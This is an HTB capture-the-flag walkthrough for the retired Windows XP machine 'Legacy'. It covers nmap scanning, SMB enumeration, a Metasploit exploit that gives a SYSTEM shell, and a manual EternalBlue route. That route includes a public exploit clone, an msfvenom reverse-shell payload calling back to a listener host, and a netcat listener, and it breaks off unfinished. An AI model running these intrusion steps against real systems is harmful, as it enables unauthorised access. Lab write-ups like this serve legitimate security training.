Legacy

“Legacy” is a retired Windows machine on HTB. This machine allows for a one-shot quick exploit known as Eternal Blue to get root access without privilege escalation.

Legacy Info

I will begin with an nmap scan to find open ports on the machine, and the services running on them.

$ nmap -A -T4 -p- 10.10.10.4 -Pn

This is what the nmap flags stand for:

  • -A All i.e. Enable OS detection, version detection, script scanning, and traceroute

  • -T4 the speed template, these templates are what tells nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.

  • -p- Scan all Transmission Control Protocol (TCP) ports: 1-65535

  • -Pn Treat all hosts as online -- skip host discovery

nmap scan results

We have 2 ports open, but running the same service: SMB. I run the command in the image below to see if I can list any fileshares, but unfortunately I cannot get a connection.

SMB Fileshare connection failed

We will perform more enumeration. I wil

l open up msfconsole to scan for the version of smb running on the machine.

smb_version module in msfconsole

I type options, set the rhost and then run the scanner.

results of auxiliary scanner

I do not get the SMB version running on the machine, but at least I get the OS which is Windows XP Service Pack 3. Using this info, I go to Google and search for SMB exploits related to the OS we have on Legacy.

I find an exploit on the rapid 7 website which I will use.

LogoRapid7Rapid7

After setting everything up, the rhost and lhost, I run the exploit and get back a meterpreter shell.

meterpreter shell

I can type help in my meterpreter shell to get access to commands I can run.

Sample of commands

I type in shell to get a windows shell to the machine, and from there I navigate around to retrieve the user and root flag. There is no need for privesc since I am Authority\System on the machine.

Without Metasploit

Since we already know that only tcp ports 139 and 445 are open, we will use the nmap scripting engine (nse) to determine if they are vulnerable.

$ nmap --script vuln -p 139,445 10.10.10.4 -Pn

or (but I used the 1st one)

$ nmap -v -script smb-vuln* -p 139,445 10.10.10.4 -Pn

We see that the machine is vulnerable to ms17-010, ms08-067, and CVE-2009–3103 exploit. Since we are looking for some form of Remote Code Execution (RCE) on the machine, and we already exploited ms08-067 using msfconsole, we will now attempt to use the ms17-010.

The vulnerability we’ll be exploiting is called Eternal Blue. This vulnerability exploited Microsoft’s implementation of the Server Message Block (SMB) protocol, where if an attacker sent a specially crafted packet, the attacker would be allowed to execute arbitrary code on the target machine.

We will use this article as a reference.

https://ethicalhackingguru.com/how-to-exploit-ms17-010-eternal-blue-without-metasploit/ethicalhackingguru.com

Firstly, we will need to download the exploit code from github.

LogoGitHub - helviojunior/MS17-010: MS17-010GitHub
$ git clone https://github.com/helviojunior/MS17-010.git

We will use msfvenom to create a reverse shell payload.

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe > eternalblue.exe

Once we have done that, we will set up a listener on our machine.

$ nc -lvp 1234

Let us now run and execute the executable exploit on the victim machine. I saved mine in my Desktop.

To be continued...

To be continued...

PreviousHTB WalkthroughsNextLame

Last updated

Was this helpful?